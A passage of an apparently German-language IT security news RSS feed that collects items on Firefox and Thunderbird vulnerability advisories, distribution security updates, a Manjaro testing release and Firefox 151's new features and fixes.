<content:encoded><![CDATA[<p><img width="1024" height="1024" src="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-firefox-thunderbird-bsi-update-alert.jpg" class="attachment- size- wp-post-image" alt="" decoding="async" srcset="https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-firefox-thunderbird-bsi-update-alert.jpg 1024w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-firefox-thunderbird-bsi-update-alert-300x300.jpg 300w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-firefox-thunderbird-bsi-update-alert-150x150.jpg 150w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-firefox-thunderbird-bsi-update-alert-768x768.jpg 768w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-firefox-thunderbird-bsi-update-alert-840x840.jpg 840w, https://www.it-boltwise.de/wp-content/uploads/2026/05/ai-firefox-thunderbird-bsi-update-alert-120x120.jpg 120w" sizes="(max-width: 1024px) 100vw, 1024px">BONN / LONDON (IT BOLTWISE) – Das Bundesamt für Sicherheit in der Informationstechnik (BSI) warnt vor mehreren Schwachstellen in Mozilla Firefox und Thunderbird, die laut Bewertung auch Fernangriffe ermöglichen. Die Einstufung liegt mit einem CVSS Base Score von 8,8 im Bereich „hoch“ (Risikostufe 4). Besonders relevant ist, dass die betroffenen Produkte sowohl Browser- als auch […]</p>
<div><a href="https://www.it-boltwise.de/firefox-und-thunderbird-luecke-bsi-warnt-risiko-4-hoch-cvss-88.html">... den vollständigen Artikel <strong>»Firefox- und Thunderbird-Lücke: BSI warnt, Risiko 4/hoch, CVSS 8,8«</strong> lesen</a></div>
<p>Dieser Beitrag <a href="https://www.it-boltwise.de/firefox-und-thunderbird-luecke-bsi-warnt-risiko-4-hoch-cvss-88.html">Firefox- und Thunderbird-Lücke: BSI warnt, Risiko 4/hoch, CVSS 8,8</a> erschien als erstes auf <a href="https://www.it-boltwise.de/">IT BOLTWISE x Artificial Intelligence</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[Testing Update] 2026-05-23 - Blender, Nvidia, Firefox, Thunderbird, Qt5]]></title>
<description><![CDATA[Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of May, beginning of June. Development speed may be a little slower the upcoming weeks. However, still let us know any issue...]]></description>
<link>https://tsecurity.de/de/3541481/unix-server/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3541481/unix-server/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/</guid>
<pubDate>Sat, 23 May 2026 09:30:46 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div data-theme-toc="true"> </div>
<p>Hello Manjaro user community, here we have another set of package updates. We are continuing our development of the upcoming release of ‘Bian-May’ which can be expected end of May, beginning of June. Development speed may be a little slower the upcoming weeks. However, still let us know any issues you may found thus far.</p>
<h3><a name="p-858097-current-promotions-1" class="anchor" href="https://forum.manjaro.org/#p-858097-current-promotions-1" aria-label="Heading link"></a>Current Promotions</h3>
<ul>
<li>Get the latest Gaming Laptop by Slimbook powered by Manjaro: <a href="https://slimbook.com/manjaro">Slimbook Manjaro III</a></li>
<li>Protect your personal data, keep yourself safe with Surfshark VPN: <a href="https://get.surfshark.net/aff_c?offer_id=6&amp;aff_id=14558-">See current promotion</a></li>
</ul>
<h2><a name="p-858097-recent-news-2" class="anchor" href="https://forum.manjaro.org/#p-858097-recent-news-2" aria-label="Heading link"></a>Recent News</h2>

New in Manjaro GNOME!
Or, if you prefer the command line: <a href="https://forum.manjaro.org/t/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/187860/1">(click for more details)</a>

KDE Plasma users with SDDM can now migrate to Plasma Login Manager <a href="https://forum.manjaro.org/t/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/187860/1">(click for more details)</a>

NVIDIA 590 driver drops Pascal support <a href="https://forum.manjaro.org/t/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/187860/1">(click for more details)</a>
<ul>
<li><a href="https://forum.manjaro.org/t/manjaro-26-1-bian-may-preview-released/187389" class="inline-onebox">Manjaro 26.1 Bian-May - Preview released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-26-0-anh-linh-released/184526" class="inline-onebox">Manjaro 26.0 Anh-Linh released</a></li>
<li><a href="https://forum.manjaro.org/t/manjaro-summit-public-alpha-now-available/176995" class="inline-onebox">Manjaro Summit public Alpha now available</a></li>
<li>As of Linux 5.4.302, the 5.4 series is now EOL (End Of Life). Please install 5.10 LTS (Long Term Support) or 5.15 LTS.</li>
<li>As of Linux 6.16.12, the 6.16 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.17.13, the 6.17 series is now EOL (End Of Life). Please install 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
<li>As of Linux 6.19.14, the 6.19 series is now EOL (End Of Life). Please install 7.0, and/or 6.18 LTS (Long Term Support) and/or 6.12 LTS.</li>
</ul>

Previous News
Finding information easier about Manjaro <a href="https://forum.manjaro.org/t/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/187860/1">(click for more details)</a>
<h2><a name="p-858097-notable-package-updates-3" class="anchor" href="https://forum.manjaro.org/#p-858097-notable-package-updates-3" aria-label="Heading link"></a>Notable Package Updates</h2>
<ul>
<li><strong>Blender</strong> <a href="https://developer.blender.org/docs/release_notes/5.1/corrective_releases/#blender-512">5.1.2</a></li>
<li><strong>NVIDIA</strong> <a href="https://www.nvidia.com/en-us/drivers/details/271252/">580.159.04</a></li>
<li><strong>Vivaldi</strong> <a href="https://vivaldi.com/blog/vivaldi-on-desktop-8-0/">8.0</a></li>
<li><strong>Firefox</strong> <a href="https://www.firefox.com/firefox/151.0/releasenotes/">151.0</a></li>
<li><strong>Thunderbird</strong> <a href="https://www.thunderbird.net/thunderbird/150.0.2/releasenotes/">150.0.2</a></li>
<li><strong>Mesa</strong> <a href="https://docs.mesa3d.org/relnotes/26.1.1.html">26.1.1</a></li>
<li><strong>Qt5</strong> <a href="https://www.qt.io/blog/commercial-lts-qt-5.15.19-released">5.15.19</a></li>
<li>Updates to <strong>Deepin</strong> and <strong>Python</strong></li>
</ul>
<h2><a name="p-858097-additional-info-4" class="anchor" href="https://forum.manjaro.org/#p-858097-additional-info-4" aria-label="Heading link"></a>Additional Info</h2>

Python 3.14 info <a href="https://forum.manjaro.org/t/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/187860/1">(click for more details)</a>

Info about AUR packages <a href="https://forum.manjaro.org/t/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/187860/1">(click for more details)</a>
<p>Get our latest daily developer images now from Github: <a href="https://github.com/manjaro-plasma/download/releases">Plasma</a>, <a href="https://github.com/manjaro-gnome/download/releases">GNOME</a>, <a href="https://github.com/manjaro-xfce/download/releases">XFCE</a>. You can get the latest <a href="https://manjaro.org/download">stable releases</a> of Manjaro from <a href="https://cdn77.com/">CDN77</a>.</p>
<hr>
<p><strong>Our current supported kernels</strong></p>
<ul>
<li>linux61 6.1.173</li>
<li>linux66 6.6.140</li>
<li>linux612 6.12.90</li>
<li>linux618 6.18.32</li>
<li>linux70 7.0.9</li>
<li>linux71 7.1.0-rc4</li>
<li>linux61-rt 6.1.167_rt62</li>
<li>linux66-rt 6.6.133_rt73</li>
<li>linux612-rt 6.12.79_rt17</li>
<li>linux617-rt 6.17.5_rt7</li>
</ul>
<p><strong>Package Changes</strong> (5/22/26 15:40 CEST)</p>
<ul>
<li>testing core x86_64:  9 new and 9 removed package(s)</li>
<li>testing extra x86_64:  542 new and 710 removed package(s)</li>
<li>testing multilib x86_64:  26 new and 26 removed package(s)</li>
</ul>
<p>A list of all package changes can be found <a href="https://termbin.com/ybru">here</a>.</p>
<p><a href="https://forum.manjaro.org/t/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/187860/1">Click to view the poll.</a></p>
<p>Check if your mirror has already synced:</p>
<ul>
<li><a href="https://repo.manjaro.org/">Mirror-Check Service</a></li>
</ul>
<hr>
            <p><small>2 posts - 2 participants</small></p>
            <p><a href="https://forum.manjaro.org/t/testing-update-2026-05-23-blender-nvidia-firefox-thunderbird-qt5/187860">Read full topic</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Friday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (firefox), Debian (chromium, nss, openvpn, and thunderbird), Fedora (cockpit, kernel, and linux-firmware), Oracle (gdk-pixbuf2, kernel, and libsndfile), SUSE (container-suseconnect, cpp-httplib, dnsmasq, firefox, glibc, GraphicsMagick, java-1_8_0-ope...]]></description>
<link>https://tsecurity.de/de/3539657/linux-tipps/security-updates-for-friday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3539657/linux-tipps/security-updates-for-friday/</guid>
<pubDate>Fri, 22 May 2026 15:10:46 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (firefox), <b>Debian</b> (chromium, nss, openvpn, and thunderbird), <b>Fedora</b> (cockpit, kernel, and linux-firmware), <b>Oracle</b> (gdk-pixbuf2, kernel, and libsndfile), <b>SUSE</b> (container-suseconnect, cpp-httplib, dnsmasq, firefox, glibc, GraphicsMagick, java-1_8_0-openj9, kernel, mozjs115, php8, python-urllib3, rekor, rootlesskit, rsync, tiff, ucode-intel, util-linux, and xz), and <b>Ubuntu</b> (bind9, bubblewrap, libarchive, linux-intel-iot-realtime, postgresql-14, postgresql-16, postgresql-17, postgresql-18, and xdg-desktop-portal).]]></content:encoded>
</item>
<item>
<title><![CDATA[Security: Mehrere Probleme in thunderbird (Debian)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3538399/unix-server/security-mehrere-probleme-in-thunderbird-debian/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3538399/unix-server/security-mehrere-probleme-in-thunderbird-debian/</guid>
<pubDate>Fri, 22 May 2026 07:15:56 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[ ]]></content:encoded>
</item>
<item>
<title><![CDATA[DSA-6288-1 thunderbird - security update]]></title>
<description><![CDATA[Multiple security issues were discovered in Thunderbird, which could
result in the execution of arbitrary code.


https://security-tracker.debian.org/tracker/DSA-6288-1]]></description>
<link>https://tsecurity.de/de/3537662/unix-server/dsa-6288-1-thunderbird-security-update/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3537662/unix-server/dsa-6288-1-thunderbird-security-update/</guid>
<pubDate>Thu, 21 May 2026 22:00:37 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Multiple security issues were discovered in Thunderbird, which could
result in the execution of arbitrary code.

<p>
<a href="https://security-tracker.debian.org/tracker/DSA-6288-1">https://security-tracker.debian.org/tracker/DSA-6288-1</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Anonymisierendes Linux: Tails 7.8 macht Thunderbird zur Zusatzsoftware]]></title>
<description><![CDATA[Das zum anonymen Surfen im Netz gedachte Linux Tails 7.8 schließt einige Kernel-Lücken und macht Thunderbird zu Zusatzsoftware.]]></description>
<link>https://tsecurity.de/de/3535992/it-nachrichten/anonymisierendes-linux-tails-78-macht-thunderbird-zur-zusatzsoftware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535992/it-nachrichten/anonymisierendes-linux-tails-78-macht-thunderbird-zur-zusatzsoftware/</guid>
<pubDate>Thu, 21 May 2026 12:47:33 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das zum anonymen Surfen im Netz gedachte Linux Tails 7.8 schließt einige Kernel-Lücken und macht Thunderbird zu Zusatzsoftware.]]></content:encoded>
</item>
<item>
<title><![CDATA[Anonymisierendes Linux: Tails 7.8 macht Thunderbird zur Zusatzsoftware]]></title>
<description><![CDATA[Das zum anonymen Surfen im Netz gedachte Linux Tails 7.8 schließt einige Kernel-Lücken und macht Thunderbird zu Zusatzsoftware.]]></description>
<link>https://tsecurity.de/de/3535961/it-security-nachrichten/anonymisierendes-linux-tails-78-macht-thunderbird-zur-zusatzsoftware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535961/it-security-nachrichten/anonymisierendes-linux-tails-78-macht-thunderbird-zur-zusatzsoftware/</guid>
<pubDate>Thu, 21 May 2026 12:35:36 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Das zum anonymen Surfen im Netz gedachte Linux Tails 7.8 schließt einige Kernel-Lücken und macht Thunderbird zu Zusatzsoftware.]]></content:encoded>
</item>
<item>
<title><![CDATA[Browser-Updates: Chrome, Firefox und Thunderbird stopfen Sicherheitslecks]]></title>
<description><![CDATA[Aktualisierungen für die Webbrowser Chrome und Firefox sowie das Mailprogramm Thunderbird stopfen teils kritische Sicherheitslücken.]]></description>
<link>https://tsecurity.de/de/3535409/it-nachrichten/browser-updates-chrome-firefox-und-thunderbird-stopfen-sicherheitslecks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535409/it-nachrichten/browser-updates-chrome-firefox-und-thunderbird-stopfen-sicherheitslecks/</guid>
<pubDate>Thu, 21 May 2026 09:17:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Aktualisierungen für die Webbrowser Chrome und Firefox sowie das Mailprogramm Thunderbird stopfen teils kritische Sicherheitslücken.]]></content:encoded>
</item>
<item>
<title><![CDATA[Browser-Updates: Chrome, Firefox und Thunderbird stopfen Sicherheitslecks]]></title>
<description><![CDATA[Aktualisierungen für die Webbrowser Chrome und Firefox sowie das Mailprogramm Thunderbird stopfen teils kritische Sicherheitslücken.]]></description>
<link>https://tsecurity.de/de/3535378/it-security-nachrichten/browser-updates-chrome-firefox-und-thunderbird-stopfen-sicherheitslecks/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3535378/it-security-nachrichten/browser-updates-chrome-firefox-und-thunderbird-stopfen-sicherheitslecks/</guid>
<pubDate>Thu, 21 May 2026 09:08:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Aktualisierungen für die Webbrowser Chrome und Firefox sowie das Mailprogramm Thunderbird stopfen teils kritische Sicherheitslücken.]]></content:encoded>
</item>
<item>
<title><![CDATA[E-Mail-Client Thunderbird 151: Update verbessert OAuth-Authentifizierung]]></title>
<description><![CDATA[Neben Firefox 151 hat Mozilla auch Thunderbird 151 veröffentlicht. Die neue Version des quelloffenen E-Mail-Clients erweitert unter anderem die OAuth-Anmeldung um zusätzliche Funktionen. Darüber hinaus beseitigt das Update wie gewohnt diverse Fehler sowie zahlreiche Sicherheitslücken.]]></description>
<link>https://tsecurity.de/de/3532928/it-nachrichten/e-mail-client-thunderbird-151-update-verbessert-oauth-authentifizierung/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3532928/it-nachrichten/e-mail-client-thunderbird-151-update-verbessert-oauth-authentifizierung/</guid>
<pubDate>Wed, 20 May 2026 14:17:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/2/7/5/4-376e9a883cab50f6/article-640x360.19ef1426.jpg"><p>Neben Firefox 151 hat Mozilla auch Thunderbird 151 veröffentlicht. Die neue Version des quelloffenen E-Mail-Clients erweitert unter anderem die OAuth-Anmeldung um zusätzliche Funktionen. Darüber hinaus beseitigt das Update wie gewohnt diverse Fehler sowie zahlreiche Sicherheitslücken.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[[NEU] [hoch] Mozilla Firefox und Thunderbird: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Mozilla Firefox, Mozilla Firefox ESR und Mozilla Thunderbird ausnutzen, um beliebigen Code auszuführen, um Informationen offenzulegen, Sicherheitsbeschränkungen zu umgehen (z. B. Sandbox-Escape), den Benutzer zu täuschen, Berechtig...]]></description>
<link>https://tsecurity.de/de/3532675/it-security-nachrichten/neu-hoch-mozilla-firefox-und-thunderbird-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3532675/it-security-nachrichten/neu-hoch-mozilla-firefox-und-thunderbird-mehrere-schwachstellen/</guid>
<pubDate>Wed, 20 May 2026 13:05:09 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Mozilla Firefox, Mozilla Firefox ESR und Mozilla Thunderbird ausnutzen, um beliebigen Code auszuführen, um Informationen offenzulegen, Sicherheitsbeschränkungen zu umgehen (z. B. Sandbox-Escape), den Benutzer zu täuschen, Berechtigungen zu eskalieren oder einen Denial-of-Service-Zustand herbeizuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[[UPDATE] [hoch] Mozilla Firefox und Thunderbird: Mehrere Schwachstellen]]></title>
<description><![CDATA[Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Mozilla Firefox, Mozilla Firefox ESR und Mozilla Thunderbird ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen preiszugeben, Sicherheitsmaßnahmen zu umgehen oder Cross-Site-Scripting- oder Spoofing-Angriffe durc...]]></description>
<link>https://tsecurity.de/de/3532210/it-security-nachrichten/update-hoch-mozilla-firefox-und-thunderbird-mehrere-schwachstellen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3532210/it-security-nachrichten/update-hoch-mozilla-firefox-und-thunderbird-mehrere-schwachstellen/</guid>
<pubDate>Wed, 20 May 2026 10:38:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Ein entfernter, anonymer Angreifer kann mehrere Schwachstellen in Mozilla Firefox, Mozilla Firefox ESR und Mozilla Thunderbird ausnutzen, um beliebigen Code auszuführen, vertrauliche Informationen preiszugeben, Sicherheitsmaßnahmen zu umgehen oder Cross-Site-Scripting- oder Spoofing-Angriffe durchzuführen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Firefox 151.0: Gratis-VPN mit Standortwahl und viele gestopfte Lücken]]></title>
<description><![CDATA[Mit der neuen Firefox-Version 151 für Windows, macOS, Linux und Android kommen einige Verbesserungen beim Schutz der Privatsphäre sowie im eingebauten PDF-Betrachter/-Editor und beim VPN. Die Entwickler haben mehr als 30 Schwachstellen behoben. Updates gibt es auch für die ESR-Versionen und den T...]]></description>
<link>https://tsecurity.de/de/3532144/it-nachrichten/firefox-1510-gratis-vpn-mit-standortwahl-und-viele-gestopfte-luecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3532144/it-nachrichten/firefox-1510-gratis-vpn-mit-standortwahl-und-viele-gestopfte-luecken/</guid>
<pubDate>Wed, 20 May 2026 10:16:44 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Mit der neuen Firefox-Version 151 für Windows, macOS, Linux und Android kommen einige Verbesserungen beim Schutz der Privatsphäre sowie im eingebauten PDF-Betrachter/-Editor und beim VPN. Die Entwickler haben mehr als 30 Schwachstellen behoben. Updates gibt es auch für die ESR-Versionen und den Tor Browser.</p>



<p>Im <a href="https://www.mozilla.org/en-US/security/advisories/mfsa2026-46/" data-type="link" data-id="https://www.mozilla.org/en-US/security/advisories/mfsa2026-46/" target="_blank" rel="noreferrer noopener">Sicherheitsbericht MFSA2026-46</a> für Firefox 151 nennt Mozilla über 30 beseitigte Sicherheitslücken, von denen 28 durch externe Sicherheitsforscher entdeckt und gemeldet wurden. Wie viele weitere, nicht aufgeführte Schwachstellen durch spezielle „KI“-Tools wie Anthropic Mythos aufgespürt wurden, lässt Mozilla offen. Mozilla-CTO Bobby Holley orakelt allerdings <a title="deutsch" href="https://blog.mozilla.org/de/privacy-security-de/ki-sicherheit-zero-days-schwachstellen/" target="_blank" rel="noreferrer noopener">im Firefox-Blog</a>, die Tage der 0-Day-Exploits seien gezählt, „KI“ sei Dank.</p>



<p><a href="https://www.pcwelt.de/article/1197811/die-neuesten-sicherheits-updates.html" target="_blank" rel="noreferrer noopener">▶Die neuesten Sicherheits-Updates</a></p>



<p>Vier der 28 extern entdeckten Sicherheitslücken stuft Mozilla als hohes Risiko ein, darunter ein möglicher Ausbruch aus der Browser-Sandbox (CVE-2026-8945), der Firefox und Firefox Klar für Android betrifft. Weitere 11 Schwachstellen sind als mittleres Risiko ausgewiesen, der Rest als geringes Risiko. Die drei letzten Einträge im Sicherheitsbericht fassen intern gefundene Sicherheitslücken zusammen, die aus Programmierfehlern bei der Speicherverwaltung resultieren. Erst vor einer Woche hatte Mozilla mit dem <a href="https://www.pcwelt.de/article/3138190/firefox-150-0-3-schnelles-update-kontert-exploit-kette-vor-pwn2own.html" data-type="link" data-id="https://www.pcwelt.de/article/3138190/firefox-150-0-3-schnelles-update-kontert-exploit-kette-vor-pwn2own.html" target="_blank" rel="noreferrer noopener">Update auf Firefox 150.0.3</a> fünf risikoreiche Sicherheitslücken geschlossen.</p>



<h2 class="wp-block-heading toc">Was ist neu in Firefox 151?</h2>



<p>Das mit Firefox 149 eingeführte und in Firefox integrierte Gratis-VPN bietet nun die Wahl zwischen mehreren virtuellen Standorten. Das kostenlose VPN ist derzeit für Firefox-Nutzer in den USA, Kanada, Großbritannien, Frankreich und Deutschland verfügbar. Und ebendiese Länder stehen auch als VPN-Standorte zur Auswahl. Sie können dieses VPN innerhalb von Firefox mit einem kostenlosen Mozilla-Konto verwenden und erhalten monatlich 50 GB nutzbares Datenvolumen. Die Verbesserungen werden schrittweise aktiviert, stehen also nicht allen Nutzern sofort zur Verfügung.</p>



<p>Wenn Sie in <a title="Download" href="https://www.pcwelt.de/article/1082606/firefox-50.html" target="_blank" rel="noreferrer noopener">Firefox </a>ein privates Fenster öffnen und nutzen, können Sie nun die ganze Sitzung per Knopfdruck löschen, ohne erst das Browser-Fenster schließen zu müssen. Es startet dann eine frische private Sitzung ohne Vorgeschichte. Der verbesserte Tracking-Schutz in Firefox 151 soll nach Mozillas Angaben die Zahl der Nutzer, die Werbetreibende mit den üblichen Fingerabdruck-Techniken identifizieren können, insgesamt um 14 Prozent reduzieren, bei macOS sogar um knapp die Hälfte.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a0d6dcb29fe6"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/05/ffx151_newtab_wallpaper.webp?w=1200" alt="Firefox 151: neue Hintergrundbilder" class="wp-image-3143908" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><em>neue, teils recht farbenfrohe  Wallpaper</em></figcaption></figure><p class="imageCredit">Mozilla</p></div>



<p>Die überarbeitete „Neuer-Tab“-Seite bietet mehr Hintergrundbilder und ist auf neue Funktionen vorbereitet, die Mozilla bis zur Freigabe von Firefox 152 am 16. Juni schrittweise einführen will. Der in Firefox integrierte PDF-Betrachter erhält eine weitere Funktion eines PDF-Editors: Er kann nun mehrere PDF-Dateien zu einer einzigen zusammenführen und speichern. Die interne Seite für das Übersetzen beliebiger Texte (about:translations) ist jetzt auch über das Menü unter „Weitere Werkzeuge“ erreichbar. Auch Linux-Nutzer können nun ihre Firefox-Profile lokal sichern und plattformübergreifend wiederherstellen.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<h2 class="wp-block-heading toc">Weitere Browser-Updates</h2>



<p>Neben Firefox 151.0 sind auch die ESR-Ausgaben 140.11.0 und 115.36.0 erhältlich. Letztere gibt es allerdings nur für Windows 7 &amp; 8.1 sowie macOS 10.12 bis 10.14. In den ESR-Versionen haben Mozillas Entwickler diejenigen der oben genannten Schwachstellen behoben, die schon im teils gut abgehangenen Code dieser Browser-Generationen stecken. Das sind nicht wenige: In Firefox 140.11 sind es mindestens 20 und in Firefox 115.35 immerhin noch wenigstens sieben geschlossene Sicherheitslücken. Firefox ESR 115 wird vorerst bis August 2026 (v115.39) weiter mit Sicherheits-Updates gepflegt.</p>



<p>Der neueste <a href="https://www.pcwelt.de/article/1105413/anonymisierungs-programm-tor.html" target="_blank" rel="noreferrer noopener" title="Download">Tor Browser</a> 15.0.14 basiert auf Firefox ESR 140.11. Das ansonsten von Mozilla unabhängige Tor-Projekt und die Nutzer des Tor Browsers profitieren so von den in Firefox gestopften Sicherheitslücken. Einen Tor Browser für ältere Systeme gibt es nicht mehr.</p>



<p>Auch Thunderbird 151.0 und 140.11.0esr werden in Kürze erscheinen. Darin haben die Entwickler ebenfalls Dutzende Sicherheitslücken beseitigt, die das Mail-Programm von Firefox geerbt hat.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mehrere Probleme in mozilla-thunderbird (Slackware)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3531529/it-security-nachrichten/mehrere-probleme-in-mozilla-thunderbird-slackware/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3531529/it-security-nachrichten/mehrere-probleme-in-mozilla-thunderbird-slackware/</guid>
<pubDate>Wed, 20 May 2026 06:37:38 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3531528/it-security-nachrichten/mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3531528/it-security-nachrichten/mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Wed, 20 May 2026 06:37:37 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Mehrere Probleme in thunderbird (Red Hat)]]></title>
<description><![CDATA[]]></description>
<link>https://tsecurity.de/de/3530883/it-security-nachrichten/mehrere-probleme-in-thunderbird-red-hat/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3530883/it-security-nachrichten/mehrere-probleme-in-thunderbird-red-hat/</guid>
<pubDate>Tue, 19 May 2026 23:23:50 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
</item>
<item>
<title><![CDATA[Thunderbird 151.0 steht zum Download bereit]]></title>
<description><![CDATA[Mozilla hat ein frisches Update für den Thunderbird veröffentlicht. Die Version 151.0 bringt vor allem unter der Haube einige Verbesserungen mit. Wer EWS-Konten nutzt, kann nun die Details der OAuth-Anbieter manuell überschreiben und die Einrichtung via Thundermail OAuth klappt jetzt...Zum Beitra...]]></description>
<link>https://tsecurity.de/de/3530013/it-nachrichten/thunderbird-1510-steht-zum-download-bereit/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3530013/it-nachrichten/thunderbird-1510-steht-zum-download-bereit/</guid>
<pubDate>Tue, 19 May 2026 19:02:18 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
